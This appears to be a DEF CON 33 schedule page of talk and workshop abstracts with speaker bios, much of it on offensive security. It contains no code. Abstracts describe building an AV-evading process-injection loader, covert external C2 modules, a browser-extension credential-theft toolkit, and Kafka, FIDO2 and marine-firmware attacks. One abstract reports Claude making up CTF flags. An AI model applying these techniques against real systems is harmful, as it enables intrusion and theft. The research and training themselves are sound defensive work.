Speakers:Eva Benn,Rosie "Lady Cyber Rosie" Anderson,Tib3riusEva Benn is a Principal Security Program Manager for the Microsoft Security and Response center. Eva has spent more of her security in red teaming and penetration testing, both as a people leader and hands-on practitioner. Before joining Microsoft, she worked in Big 4 cybersecurity consulting, leading global penetration testing and cybersecurity initiatives across various industries. She is a globally recognized security leader, holding an extensive list of industry certifications, including CISSP, CEH, CCSP, Security+, GSEC, GCIH, GSTRT, GPEN, GWAPT, GRTP, etc.
SpeakerBio: Rosie "Lady Cyber Rosie" Anderson, Organiser at Manchester2600Rosie Anderson is Head of Strategic Solutions for th4ts3cur1ty.company AKA Magical Genie Person. Having previously spent two decades talking to businesses to solve their hiring challenges, and helping people to break into cyber security as a recruiter, Rosie now uses those skills to help businesses solve their cybersecurity challenges. Rosie also founded BSides Lancashire, is a Director of BSides Leeds and restarted the Manchester 2600 Hacker Community, the only 2600 to be run by two women in its 40 year history. She was awarded Most Inspiring Woman in Cyber Security for 2024 and Cyber Newcomer for 2025.
Rosie has been a mentor for Capslock a cyber training programme for over two years, and is also part of the Ethical Council for Hacking Games. Giving back is important to her, and she loves the pay-it-forward mentality.
SpeakerBio: Tib3rius, Cybersecurity Content CreatorTib3rius is a professional penetration tester who specializes in web application hacking, though his background also includes network penetration testing. He is OSCP certified, and likes developing new tools for penetration testing, mostly in Python. He helps run an OSCP prep discord server, and enjoys passing on his knowledge to students who have a passion for information security.
- ics Calendar file
Malicious packages have grown 156% YoY for supply chain security and supply chain attacks cost organizations $41 billion in 2023 (projected to reach $81 billion by 2026). This session underscores the urgent need to re-examine our defensive postures for software supply chain security by taking an offensive security perspective.
Speakers:Roni "lupin" Carta,Adnan KhanRoni Carta, known as Lupin and co-founder of Lupin & Holmes, is an ethical hacker specializing in offensive cybersecurity, with a strong background in bug bounty hunting, including a $50,000 reward for hacking Google AI, red teaming at ManoMano, and significant research into software supply chain vulnerabilities, notably presenting at DEF CON 32 and recently reporting a hack of Google's AI Gemini; his diverse technical skills range from ATO and RCE exploits to supply chain security, earning him recognition in various cybersecurity competitions.
SpeakerBio: Adnan Khan, AWS
- ics Calendar file
Browser extensions have become increasingly popular for enhancing the web browsing experience. Common examples are ad blockers, cryptocurrency wallets, and password managers. At the same time, modern websites frequently display intrusive elements, such as cookie consent banners, newsletter subscription modals, login forms, and other elements that require user interaction before the desired content can be displayed.
In this talk, I will present a new technique based on clickjacking principles that targets browser extensions, where I used fake intrusive elements to enforce user interaction. In my research, I tested this technique on the 11 most widely used password managers, which resulted in discovering multiple 0-day vulnerabilities that could affect tens of millions of users. Typically, just one click was required from a user to leak their stored private information, such as credit card details, personal data or login credentials (including TOTP). In some cases, it could lead to the exploitation of passkey authentication.
The described technique is general and can be applied to browser extensions beyond password managers, meaning other extensions may also be vulnerable to this type of attack. In addition to describing several methods of this technique, I will also recommend mitigations for developers to protect their extensions against this vulnerability.
SpeakerBio: Marek TóthMarek Tóth is a security researcher from the Czech Republic specializing in web application security. In his free time, he conducts independent research or reports critical vulnerabilities that could be exploited by attackers, with a recent focus on Czech companies. He shares interesting findings on his personal website, youtube channel or presents them at conferences, primarily at OWASP Chapter meetups.
- ics Calendar file
[Overview]
Malware analysis often focuses on detonation, leaving new defenders and red‑teamers wondering how a loader is actually assembled. In this accelerated, beginner‑friendly, two‑hour hands‑on workshop, participants start with a ready‑to‑build Visual Studio solution and finish with a fully functional Windows 11 process‑injection loader written in C. We focus on the classic three‑call technique: VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, plus a quick single‑byte XOR obfuscation pass and file bloating operation. All workshop time is devoted to getting a working loader, testing it against Windows Defender, and understanding each step well enough to particpants can expand beyond it.
[Course Outline]
Environment Jump-Start 0.1 Cover Windows 11 snapshot with tools and skeleton code. 0.2 Confirm build of Loader.sln.
Loader Fundamentals 1.1 Loader vs payload overview 1.2 Memory layout and why VirtualAllocEx / WriteProcessMemory / CreateRemoteThread works.
Hands-On Build 2.1 VirtualAllocEx - reserve RWX in target. 2.2 WriteProcessMemory - copy shellcode. 2.3 CreateRemoteThread - execute and watch notepad.exe execute. 2.4 Breakpoint demo in x64dbg.
Evasion 3.1 Wrap shellcode in XOR decoder stub. 3.2 Bloat file with appneded null bytes. 3.3 Show Defender detection before and after.
Wrap-Up and Next Steps 4.1 Provide code branches: indirect-syscalls, AMSI-bypass 4.2 Safe research and legal reminders 4.3 Recommended reading links
Malware developer and vulnerability researcher with a focus on red team tooling. A purveyor of CTFs and watcher of shellcode pop, they enjoy crafting PoCs and designing CTF challenges for the community. Their current research explores Windows malware development, covert communication channels, and fuzzing techniques.
- ics Calendar file
Let’s face it — traditional HTTP C2 is burning out. Between aging domains, TLS cert management, sandbox fingerprinting, and blue teams getting smarter at categorizing traffic and infrastructure, your custom C2 feels less covert and more like a liability. Red teams and threat actors alike are shifting toward living off legitimate services — AWS, GitHub, Box, Notion, whatever blends in — but building solutions that are custom to a single C2 framework? Let’s stop doing that. Let’s share the fun! C4 (Cross-Compatible Command & Control) is here to change that. It’s a modular toolkit of WASM-powered plugins that makes external C2 easy to implement, regardless of your implant's language or target OS. Whether you’re writing in C, Rust, Go, Python, C#, or something else entirely, C4 plugins can be loaded directly into your implant and run on Windows, macOS, or Linux. But the real game-changer? C4 provides a single, centralized collection of over 10 fully-documented, operationally-ready external C2 modules — not just proof-of-concepts, but production-level integrations with trusted sites that fly under the radar. No more hunting through GitHub repos, hand-rolling fragile API calls, or hacking together glue code for every new environment. Stop reinventing external C2 and start planting some C4 in your implants!
SpeakerBio: Scott "ScottCTaylor12" Taylor, Senior Red Team Operator at Sony's Global Threat EmulationScott Taylor is a Senior Red Team Operator on Sony's Global Threat Emulation team. Scott has previously worked at the MITRE Corporation and T. Rowe Price focused on emulating adversary behaviors. While Scott has been a technical professional for a decade, only the second half was focused on offensive security. He started as a Linux system administration intern where he learned to build before later learning to break. Scott leverages his system administration background in his offensive security career where he passionately researches command and control (C2) infrastructure for red team operations. Open-source publications by Scott include custom C2 channels for popular C2 frameworks, leveraging cloud services for C2, and automating red team infrastructure deployment.
- ics Calendar file
Dive into the world of Operational Technology (OT) adversary emulation — no racks of hardware required. With Caldera for OT (C4OT) and our new virtual device simulators, you can explore the inner workings of OT network communications from the comfort of your own home lab. The biggest industrial control systems incidents — FrostyGoop, PIPEDREAM, Industroyer — didn’t rely on flashy zero-days to impact physical systems. Instead, they used native OT protocols to send valid messages with malicious intent. Now, with C4OT, you can step into the attacker’s shoes and explore the quirks and capabilities of protocols like Modbus, DNP3, and IEC61850. No hardware? No problem. No experience? Even better. In this session, we’ll show you how to get started with adversary emulation against simulated OT devices, unlocking a hands-on environment to test your attacks, validate your defenses, and gain practical insights into the world of industrial cybersecurity. Whether you’re a defender looking to understand the threats, a researcher diving into OT protocol behavior, or a red-teamer eager to sharpen your skills, C4OT gives you the tools to experiment safely and effectively. Join us to see how C4OT is revolutionizing adversary emulation for OT — one packet at a time.
Speakers:Devon Colmer,Tony WebberDevon serves as the lead for Caldera for operational technology (OT) within MITRE’s Critical Infrastructure Protection Innovation Center (CIPIC). He specializes in OT adversary emulation and detection engineering, leading the development of OT plugins for MITRE’s Caldera platform. Beyond Caldera, he is researching a common data model for OT protocols to lower the barrier of entry for OT network defenders.
SpeakerBio: Tony WebberTony is the lead for counter measures for operational technology in MITRE’s Critical Infrastructure Protection Innovation Center (CIPIC). His work has spanned systems engineering, solution prototyping, capabilities development, and deployment of cybersecurity and cyber situational awareness solutions for defending industrial control systems. His current focus is adversary emulation for ICS and space systems.
- ics Calendar file
Join Call Center Village at Party Line, a carefully-crafted telephony-themed party open to all DEF CON 33 attendees. Help us celebrate the human operators who keep call centers and answering services private, usable, and accessible. Between the illuminated telephone decorations and the sponsor-supplied drink-ticket drops, you're bound to find something to dial up the fun.
- ics Calendar file
- ics Calendar file
On Day 2 of DEFCON, bring your resume for a comprehensive review by industry professionals. Get personalized feedback and tips to enhance your resume, making it stand out to potential employers in the cybersecurity field.
Speakers:Ruchira Pokhriyal,Harini RamprasadRuchira is currenty working as a Senior Threat Detection and Response Engineer at Lending Club.
SpeakerBio: Harini Ramprasad, Security Engineer at SnapHarini is currently wokring as Security Engineer at Snap.
- ics Calendar file
Ever wondered what happens after you hit "submit" on a bug bounty report? At T-Mobile, each submission kicks off a behind-the-scenes journey that spans teams, tools, and time zones. In this talk, we’ll walk through the lifecycle of a bug bounty submission—from Bugcrowd’s triage desk to our internal security workflows—and show why not every finding is considered equal from a business risk perspective.
SpeakerBio: Elisa Gangemi, Senior Cybersecurity Engineer at T-MobileElisa Gangemi is a Senior Cybersecurity Engineer on the OffSec Team at T-Mobile, where they manage the Penetration Testing Pipeline and contribute to the company’s Bug Bounty Program. With prior experience in offensive and product security at startups, Elisa helped launch vulnerability management programs, including bug bounty initiatives and security tooling. They began their technology career as a QA tester, then transitioned into InfoSec at Akamai Technologies, working on technical program management and security research. Elisa holds the GIAC GWAPT certification and serves on the GIAC Advisory Board. They’ve enjoyed learning hacking techniques and have participated in a U.S. team that twice placed in the top four at NorthSec’s CTF in Montreal. DEF CON 33 marks their first year attending and speaking.
- ics Calendar file
- ics Calendar file
Over the past few months, we've thrown Claude into the digital trenches of multiple cybersecurity competitions—from defending vulnerable networks at CCDC to cracking challenges in PicoCTF and HackTheBox. In this talk, I'll take you through our journey deploying an AI assistant against human red teams and live CTF challenges. I'll show you Claude's unexpected wins (landing in the top 3% globally in PicoCTF and successfully fending off red team attacks at CCDC) alongside its entertaining fails (devolving into security philosophy when overwhelmed, making up flags for PlaidCTF when stuck).
Drawing on these results, I'll break down the technical challenges we conquered, from building specialized tooling harnesses to keeping Claude coherent during 16+ hour competitions. This presentation will demonstrate how competitive environments reveal both the impressive capabilities and amusing limitations of today's AI systems when operating in adversarial scenarios. Join me to see what happens when an assistant trained to be helpful gets dropped into the dynamic world of CTFs and defense competitions—and what this teaches us about AI's true potential in cybersecurity.
References:
SpeakerBio: Keane Lucas, Member of Technical Staff at AnthropicKeane is a researcher on Anthropic's Frontier Red Team focused on stress-testing AI model cybersecurity capabilities. Before joining Anthropic, Keane served as a Cyberspace Operations Officer in the US Air Force and earned his PhD at Carnegie Mellon, where his research focused on applying machine learning to malware detection.
- ics Calendar file
Apache Kafka is an open-source distributed event streaming platform. At the heart of Kafka lies the Broker, which acts as the central server node in a Kafka cluster. Brokers are responsible for storing streams of data and managing the flow of messages between producers and consumers. The Kafka Server we often refer to is essentially the Kafka Broker.
While Kafka’s main system handles data streams well, its real strength comes from its growing ecosystem. The components in the ecosystem greatly expands its abilities: Confluent ksqlDB transforms raw streams into queryable tables for real-time analytics; Schema Registry standardizes data formats across microservices, and so on.
However, behind the rich components lie hidden security threats. Prior research has revealed Remote Code Execution (RCE) vulnerabilities in Kafka Client, yet notably absent were any exploitable RCE vulnerabilities in the Kafka Server — until now. In this work, we present the first-ever RCE vulnerability affecting Kafka Server itself. At the same time, we also used similar techniques to attack other components in the Kafka ecosystem. And these vulnerabilities can also affect the cloud service providers themselves. What's more, Since Kafka users remain unaware of this risk, thousands of Kafka servers are now exposed to this RCE vulnerability.
Speakers:Ji'an "azraelxuemo" Zhou,Ying Zhu,ZiYang "lz2y" LiJi'an Zhou is a Security Engineer in Alibaba Cloud. He is focusing on Java security and cloud native security and his work helped many high-profile vendors improve their products' security, including Google, Amazon, Cloudera, IBM, Microsoft, Oracle. He has previously spoken at Black Hat , Zer0Con, Off-by-One Con.
SpeakerBio: Ying ZhuYing Zhu is a Security Engineer in Alibaba Cloud. He is interested in Web application security, especially Java application security. He has reported many critical vulnerabilities to Amazon, Apache, Cloudera, Microsoft, etc.
SpeakerBio: ZiYang "lz2y" LiZiyang Li is a Security Engineer in Alibaba Cloud. He is focused on Java security and security products. He has reported many critical vulnerabilities to Amazon, Apache, Cloudera, Microsoft, etc.
- ics Calendar file
Want to give vishing a shot? Step into our soundproof booth, grab a mystery target with its number and three challenge tiers, and see if you can nail easy, medium, and hard objectives - first come, first served!
- ics Calendar file
Copycat is a browser extension-based red team toolkit for simulating web-based identity attacks. This tool simulates ten web-based identity attacks through a single browser extension with minimal permissions, operating primarily through hidden windows that execute attacks without user awareness. With Copycat, red teams can simulate complex attack scenarios including silent Gmail and LinkedIn hijacking, credential theft through login and OTP stealing, login page redirection, autofill extraction from enterprise applications, and multiple OAuth manipulation techniques. Copycat runs entirely in-browser with no special hardware requirements. Red teams can use Copycat to demonstrate attack vectors that bypass EDRs, SASE, and other traditional security controls, as these techniques operate within legitimate authenticated sessions rather than breaking them. The tool is fully modifiable, with each module designed for customization to target different services or authentication flows. Source code and documentation will be available for security researchers to extend and improve the framework. Special mention to Pankaj Sharma, Tejeswara S. Reddy, and Arpit Gupta for their contributions in building this toolkit!
Speakers:Dakshitaa Babu,Shourya Pratap SinghDakshitaa is a security researcher and product evangelist at SquareX, where she leads the security research team. A self-taught cybersecurity researcher mentored by offensive security veteran Vivek Ramachandran, she specializes in web attacks — malicious websites, files, scripts, and extensions capable of bypassing traditional security solutions. Her research directly fuels SquareX's product innovation, ensuring it stays ahead of evolving threats. As a product evangelist, she is the principal author of SquareX's technical collateral. She has contributed to bleeding-edge browser security research presented at BSides SF Adversary Village, Recon Village, and the DEF CON main stage. Her work on email security bypasses, breaking secure web gateways, MV3 extension vulnerabilities, browser syncjacking, polymorphic extensions, and browser-native ransomware has been covered by leading media outlets, including Forbes, TechRadar, Mashable, The Register, Bleeping Computer, and CyberNews.
SpeakerBio: Shourya Pratap SinghShourya Pratap Singh is responsible for building SquareX's security-focused extension and conducts research on countering web security risks. As a rising figure in cybersecurity, Shourya has presented his work on global stages including the DEFCON main stage, Recon Village, and Adversary Village, as well as at Black Hat Arsenal EU. He has also delivered several workshops at prestigious events such as the Texas Cyber Summit. Shourya earned his bachelor's degree from IIIT Bhubaneswar and holds a patent. His professional interests focus on strengthening the security of browser extensions and web applications.
- ics Calendar file
There's been remarkably little discussion about how mobile forensic tools fare against adversarially modified environments, particularly in terms of forensic reliability. Tools (and investigators) often assume that target devices function as expected, with minimal scrutiny of whether that assumption holds. Our research demonstrates otherwise - sophisticated anti-forensic techniques placed within Android devices can silently compromise evidence, placing longstanding investigative and extraction methodologies at risk.
Our research addresses a blind spot in Android logical extraction workflows - namely, an assumption that once mobile forensic software overcome the hurdle of device access, the extraction is assumed to follow correctly. While forensics software excel at getting a foot in the door, from our actual tests they offer little against stealthy, second-layer countermeasures that can silently manipulate or destroy data post-access.
Speakers:Weihan Goh,Joseph Lim,Isaac SoonDr Weihan Goh is an Associate Professor at the Singapore Institute of Technology (SIT). His research interests include digital forensics, anti-forensics, security testing, as well as technologies for cybersecurity education such as cyber ranges, CTF / CDX, remote proctoring, and anti-fraud / anti-cheat systems. Beyond teaching and research, Dr Goh participates in capture-the-flag exercises, going by the CTF handler 'icebear'.
SpeakerBio: Joseph Lim, Final-year Information Security Student, Singapore Institute of TechnologyJoseph Lim is an Information Security undergraduate at the Singapore Institute of Technology, with a diploma in Infocomm Security Management from Singapore Polytechnic. With a strong foundation in cybersecurity, he is particularly interested in mobile security and digital forensics. Joseph has also previously presented research on mobile malware at the 14th ACM Conference on Data and Application Security and Privacy (2024).
SpeakerBio: Isaac Soon, Final-year Information Security Student, Singapore Institute of TechnologySoon Leung Isaac is currently pursuing a degree in Information and Communication Technology, specializing in Information Security, at the Singapore Institute of Technology. Previously, he served as a SOC analyst in the Singapore Armed Forces for two years, where he was responsible for safeguarding Singapore's military network. His main areas of research include offensive security and mobile security.
- ics Calendar file
Pseudo-Random Number Generators are often overlooked and core features of our computational experience. From research and processes irrelevant to security (i.e. Monte-Carlo simulations) to essential security functionality like secret generation, random number generation plays a significant part in our ability to utilize the modern internet. In turn, they have a unique history, threat model, and set of applications. We will discuss the history of pseudo-random number generation, the types of random number generators, where they are supposed to be utilized, and how to break them, when relevant. Additionally, we will discuss the future direction of random number generation in light of preparation for the advent of large-scale quantum computing.
SpeakerBio: 1nfocalypse1nfocalypse is a software engineer with an interest in coding theory, cryptography, and numerical analysis. He is currently working on portions of libstdc++-v3 and enjoys implementing/tinkering with cryptographic primitives and standards.
- ics Calendar file
AI 🤖 is being discussed in pretty much all presentations out there. So, what is different about this session? This is a completely hands-on workshop where we will explore cutting edge agentic frameworks through the creation of an AI agent designed to hack web applications 🌐. You will learn how to develop a modular AI agent capable of performing reconnaissance, vulnerability scanning, and exploiting a web application. We will cover an overview of current AI techniques applicable to red team operations through live demonstrations and interactive exercises.
🚀 Join Omar Santos at DEF CON's Red Team Village to explore how the fusion of AI and red teaming not only redefines the landscape of cyber offensive operations, but also sets the stage for pioneering defensive countermeasures .
🛡️ This workshop promises to equip you with both the knowledge and practical skills to leverage AI in red team operations.
SpeakerBio: Omar SantosOmar Santos is an active member of the security community, where he leads several industry-wide initiatives and standard bodies. Omar is a Distinguished Engineer at Cisco focusing on artificial intelligence (AI) security, cybersecurity research, incident response, and vulnerability disclosure. He is a board member of the OASIS Open standards organization and the founder of OpenEoX. Omar is the co-chair of the Coalition of Secure AI (CoSAI). Omar's collaborative efforts extend to numerous organizations, including the Forum of Incident Response and Security Teams (FIRST) and the Industry Consortium for Advancement of Security on the Internet (ICASI). Omar is the co-chair of the FIRST PSIRT Special Interest Group (SIG). Omar is the co-founder of the DEF CON Red Team Village and the chair of the Common Security Advisory Framework (CSAF) technical committee.
Omar is the author of over 25 books, 21 video courses, and over 50 academic research papers. Omar is a renowned expert in ethical hacking, vulnerability research, incident response, and AI security. He employs his deep understanding of these disciplines to help organizations stay ahead of emerging threats. His dedication to cybersecurity has made a significant impact on technology standards, businesses, academic institutions, government agencies, and other entities striving to improve their cybersecurity programs. Prior to Cisco, Omar served in the United States Marines focusing on the deployment, testing, and maintenance of Command, Control, Communications, Computer and Intelligence (C4I) systems.
- ics Calendar file
Buildings are largely overlooked when it comes to cyber security. The onus is typically placed on physically securing the building and the people inside of them. What most gloss over is the fact that industrial control systems run these buildings and without them, every day functions become unavailable and downright dangerous. The dangers are growing as buildings become more "connected" and require internet access to operate (ex. sustainability and IoT). Malicious use of engineering protocols (Modbus, Fox, BACNet) and targeted attacks against BAS systems are growing (ex. KNXLock).”
Environments run the gamut from overly secure, to the point of crippling, all the way to leaving RDP exposed with no logging or MFA to critical systems. There is no easy fix, properties must invest in technology and people to create a defensible environment. This presentation will show how cyber security can be enabled which fits with the business's operations and minimal disruption.
Building types are not constrained to only office space. Properties come in all varieties from warehouses and manufacturing spaces to data centers and shopping malls. All of this needs to be taken into account when assessing the environment and recommending tools and procedures. This talk will cover common architectures seen, typical control systems found in buildings (BMS, FLS, elevator, lighting, power...), reproducible steps to help companies/users understand their vulnerabilities and how we, as an industry, move forward.
For the most part, these are not technical problems, but a literal gap that needs to be addressed directly by budgetary and policy controls. The industry is pushing for cybersecurity budgeting, standards and visibility for properties, which are largely ignored or misunderstood by owners and operators. This is a solvable problem and I want attendees to feel empowered to ask tough questions and be prepared to have an educated conversation about the risks and not use fear mongering or scare tactics to get cybersecurity put in place.
SpeakerBio: Thomas Pope, JILThomas Pope is the Head of Property Cybersecurity at Jones Lang Lasalle (JLL). His team assists customers and internal teams with securing control systems at their properties and how to accomplish cybersecurity at scale with regards to building operations. Previous stints including leading incident response engagements at Cisco Talos as an Incident Commander, Adversary Hunter at Dragos; searching for ICS-specific adversaries and standing up multiple cybersecurity programs at Duke Energy.
- ics Calendar file
- ics Calendar file
Multiple agencies have attempted to regulate cryptocurrencies through various means. This workshop will begin with a short presentation about the different organizations with an interest in regulating cryptocurrency (SEC, CFTC, IRS, and DOJ) and provide examples of enforcement actions. Next, participants will break out into discussion groups to consider the pros and cons of regulation by enforcement. Then, participants will be given a hypothetical cryptocurrency and be assigned a role either as a 'regulator' or as a 'developer.' The participants will engage in a settlement type discussion to determine if the cryptocurrency should be regulated under one agency, multiple agencies, or not at all.
Speakers:Veronika,Chelsea ButtonChelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.
- ics Calendar file
Cryptocurrency nodes validate and relay transactions across the network. Like servers in a traditional financial system, nodes store a copy of the blockchain and enforce the network's rules. Many of us want to run their own node for reasons of security, convenience, and independence of other people's node configurations. Come to understand nodes, build your own, and explore configurations to test wallet applications on your new cryptocurrency node.
Speakers:Diego "rehrar" Salazar,DanDiego 'rehrar' Salazar has been around the FOSS and cryptocurrency communities for eight years. He owns and runs Cypher Stack, a company that performs novel research and makes contributions to various FOSS projects. He has organized and managed several villages at defcon, c3, and more.
SpeakerBio: Dan
- ics Calendar file
Reporting on the state of affairs in Cryptocurrency trends, Nick and Elaine give insight from their esteemed positions in industry and academy. Additionally, we get a status report of workshops, showcases, and programs in the Cryptocurrency areas of DEF CON. We announce the teams competing in the Cryptocurrency Cyber Challenge, and give an overview of what's available in the vending area. Meet the organizers of years of cryptocurrency content at DEF CON and bring your questions to the Community Stage!
Speakers:Chelsea Button,Nick "c7five" Percoco,Elaine ShiChelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.
SpeakerBio: Nick "c7five" Percoco, CSO at KrakenNick Percoco is the Chief Security Officer at Kraken, where he spearheads the frameworks and protocols that ensure a secure and seamless trading experience for clients. A recognized leader in the security and hacker community, Nick brings nearly 30 years of expertise in cybersecurity and technology, shaping the industry's approach to threat defense and risk mitigation. A dedicated contributor to the security community, he founded THOTCON, Chicago’s premier non-profit hacking conference, and has been a contributor to secure infrastructure and network design at DEFCON, the world’s largest hacking conference, since 2017. An accomplished speaker and researcher, Nick has presented groundbreaking work on cryptocurrency security, targeted malware, mobile security (iOS & Android), and IoT vulnerabilities at leading global forums, including Black Hat, RSA Conference, DEFCON, CfC St. Moritz, and SXSW.
SpeakerBio: Elaine Shi, Professor at Carnegie Mellon UniversityElaine Shi is a Packard Fellow, Sloan Fellow, ACM Fellow, and IACR Fellow. A Professor with a joint appointment in CSD and ECE at Carnegie Mellon University, Elaine is also an Adjunct Professor of Computer Science at the University of Maryland. Her research interests include cryptography, security, mechanism design, algorithms, foundations of blockchains, and programming languages. Elain is a co-founder of Oblivious Labs, Inc. My research on Oblivious RAM and differentially private algorithms have been adopted by Signal, Meta, and Google.
- ics Calendar file
In 2022 a framework and tool for cryptographic attacks called Cryptosploit was introduced. In this workshop we will demo the capabilities and the underlying philosophy as well as new commands. This will include the flexibility of mixing and matching attack code with oracles and new commands to import and export cryptographic keys. In particular, we will demonstrate how after a successful attack on a public key, we will be able to export the private key corresponding to the certificate. The presentation will conclude with thoughts on improvements.
SpeakerBio: Matt CheungMatt Cheung started developing his interest in cryptography during an internship in 2011. He worked on implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. Implementation weaknesses were not a priority and this concerned Matt. This concern prompted him to learn about cryptographic attacks from Dan Boneh's crypto 1 course offered on Coursera and the Matasano/cryptopals challenges. From this experience he has given workshops at the Boston Application Security Conference, BSidesLV, DEF CON, and the Crypto and Privacy VillageHe now serves on the programming committee of the Crypto and Privacy Village. He now serves on the programming committee of the Crypto and Privacy Village.
- ics Calendar file
FIDO2 is the de-facto standard for passwordless and 2FA authentication. FIDO2 relies on the Client-to-Authenticator Protocol (CTAP) to secure communications between clients (e.g., web browsers) and authenticators (e.g., USB dongles). In this talk, we perform a security assessment of CTAP and its Authenticator API. This API is a critical protocol-level attack surface that handles credentials and authenticator settings.
We investigate the standard FIDO2 setup (credentials stored by the relying party) and the most secure setup, where credentials are stored on the authenticator, protected from data breaches. We find that FIDO2 security mechanisms still rely on phishable mechanisms (i.e., PIN) and unclear security boundaries (e.g., trusting unauthenticated clients).
We introduce eleven CTRAPS attacks grouped into two novel classes: Client Impersonation and API Confusion. These attacks exploit CTAP vulnerabilities to wipe credentials, perform unauthorized factory resets, and track users. Our open-source toolkit implements the attacks on two Android apps, an Electron app, and a Proxmark3 script, supporting the USB HID and NFC transports. In our demos, we show how to use our CTRAPS toolkit to exploit popular authenticators, like YubiKeys, and relying parties, like Microsoft and Apple.
References:
Marco Casagrande is a postdoctoral researcher in cybersecurity at the KTH Royal Institute of Technology (Sweden). He specializes in the security of real-world smart devices, including fitness trackers, FIDO authenticators, and electric scooters.
SpeakerBio: Daniele AntonioliDaniele Antonioli is an Assistant Professor at EURECOM in the software and system security (S3) group. He researches and teaches applied system security and privacy, with an emphasis on wireless communication, such as Bluetooth and Wi-Fi, embedded systems, such as cars and fitness trackers, mobile systems, such as smartphones, and cyber-physical systems, such as industrial control systems.
- ics Calendar file
Contestants will access a virtual environment with dynamic challenges that need to be exploited and contested. Individuals gain points for each system they are able to plant and maintain their flag on.
- ics Calendar file
Redteam Rumble was piloted with a single competition at DEFCON 32 with great success, and we're thrilled to bring it back for DefCon 33! This event is designed with more advanced competitors in mind, and is not for the faint of heart!
Teams will defend their ""Castle,"" a virtual environment comprising several systems and services (both Windows and Linux systems may be included). Each castle has exposed services and exploitable vulnerabilities, along with a few hidden extras.
This event is a free-for-all between 4 teams competing against each other to gain points by controlling services and flags within their own, and each opponents, infrastructure. That means your team will have to balance defending your own systems, while simultaneously hunting for vulnerabilities that can be exploited to control other teams' systems.
Each event will consist of 4 teams competing in a free-for-all for 2 hours. Pre-registration is required.
- ics Calendar file
Strategic Operations will feature two teams going head to head in a classic offense vs defense battle. The defensive team gains points by successfully providing mission critical services during a short scoring window, while offensive teams will gain points by performing targeted service interruptions and data manipulation.
Each event will consist of 2 teams competing in an attacker vs defender battle for anywhere from 30 - 90 minutes. Pre-registration is reccomended, but not required.
One of our goals with Strategic Operations is to provide a fun and engaging experience for attendees that discover us on the competition floor, without requiring prior registration. We will do our best to accomodate walk in participants when possible!
- ics Calendar file
DEF CON's first-ever race: Expect to hear hardcore, happy hardcore, breakcore, speedcore, hardstyle. Bring your phat pants, kandi bracelets, and nine inch nails (on finger) to this once in a lifetime rave.
- ics Calendar file
For all people that want to hang out and celebrate the lives and death of influential people to the hacker community. Attendees are encouraged to dress to kill in Day of the Dead attire or any attire that includes dead heroes. Music will be provided by CURZES and special guest DJs.
Everyone is welcome to join us and celebrate the dead!
- ics Calendar file
Community is essential and so is continual learning. Reading and discussing books can greatly impact an individual’s access and sense of community and knowledge. This DEF CON book discussion will be an accessible group aiming to build community and share out learnings, all in a quieter setting. Come join us in person and discuss what you’ve been reading. This DC Book Club is not locked to a region and we're around all year on Discord, where we discuss books and other topics. This meetup is for those who love books and escaping to the cyperpunk, scifi worlds that inspire DEF CON and our future. Come join us!
- ics Calendar file
DCNextGen event for youth 8-18 only. The DC NextGen youth party is the perfect place to loosen up and have fun with other kids and teens your age! There is no better time to hang out and chat with the new friends you've made here. All while enjoying fun games and cyber themed activities. Are you ready to build a team and hack the planet?
- ics Calendar file
Future of DDoS Attacks and Prevention
SpeakerBio: Andrew Cockburn, Netscout
- ics Calendar file
- ics Calendar file
Modern software protectors increasingly rely on complex, often nested, virtualization techniques (VMProtect, Themida, custom solutions) which significantly hinder static and dynamic analysis. This talk introduces DragonSlayer, an automated framework combining symbolic execution with fine-grained dynamic taint tracking to systematically lift obfuscated bytecode from these protectors. Our approach precisely identifies VM handlers, recovers original instruction semantics, automatically unpacks multiple virtualization layers, and reconstructs analyzable representations of protected code. We demonstrate DragonSlayer's effectiveness against the latest commercial VM protectors and custom obfuscation solutions, significantly reducing analysis time from weeks to hours. This presentation includes technical deep-dives into our methodology, real-world case studies, and a demonstration of our tooling that helps reverse engineers slay the virtualization dragon.
References:
Dr. Agostino "van1sh" Panico is a seasoned offensive security expert with over 15 years of experience specializing in advanced red teaming, exploit development, product security testing, and deception tactics. He is one of the few hundred globally to hold the prestigious GSE (GIAC Security Expert) certification. Driven by a passion for uncovering vulnerabilities, Agostino actively contributes to the security community as an organizer for BSides Italy, fostering collaboration and innovation.
- ics Calendar file
We demonstrate a vulnerability in a commonly-used autopilot computer that allows unsigned firmware to be pushed through trusted update channels such as SD cards and NMEA 2000 networked chart plotters without authentication or cryptographic validation. We show how a malicious ‘.swup’ file can be crafted and accepted by the system to gain persistent code execution, enabling arbitrary CAN bus injection on marine control networks. The attack chain, reminiscent of removable media-style delivery in air-gapped systems, demonstrates how firmware-level control in marine environments can be leveraged to disrupt navigation subsystems. We will walk through firmware extraction, reverse engineering of firmware and CAN subroutines, firmware repackaging, and live effects on NMEA 2000 networks. No physical access to the autopilot is needed, the attack leverages trusted firmware delivery via the chart plotter over NMEA 2000.
Speakers:Carson Green,Rik ChatterjeeCarson Green is a graduate research assistant in systems engineering from Colorado State University, with a bachelor’s degree in electrical engineering. He enjoys designing and debugging PCB’s, researching vulnerabilities in cyber-physical systems, and can often be found playing the banjo.
SpeakerBio: Rik Chatterjee, Colorado State UniversityRik is a PhD student at Colorado State University exploring the tangled edge of embedded systems and cybersecurity. His research focuses into real-world vulnerabilities in automotive and industrial controllers, from reverse-engineering to network protocol level vulnerabilities. He’s previously shared his work at DEF CON and NDSS. When he’s not pulling apart PCBs, you’ll find him elbow-deep in his vegetable garden, proving that both firmware and tomatoes need rooting.
- ics Calendar file
- ics Calendar file
Fuzzing is a technique of identifying software vulnerabilities by automated corpus generation. It has produced immense results and attracted a lot of visibility from security researchers and professionals in the industry, today fuzzing can be utilized in various ways which can be incorporated into your secure SDLC to discover vulnerabilities in advance and fix them. Attendees will be emulating techniques which will provide a comprehensive understanding of "Crash, Detect & Triage" of fuzzed binaries or software. In "Deep dive into fuzzing" we will be covering a detailed overview of fuzzing and how it can be beneficial to professionals in uncovering security vulnerabilities with a hands-on approach through focus on labs.
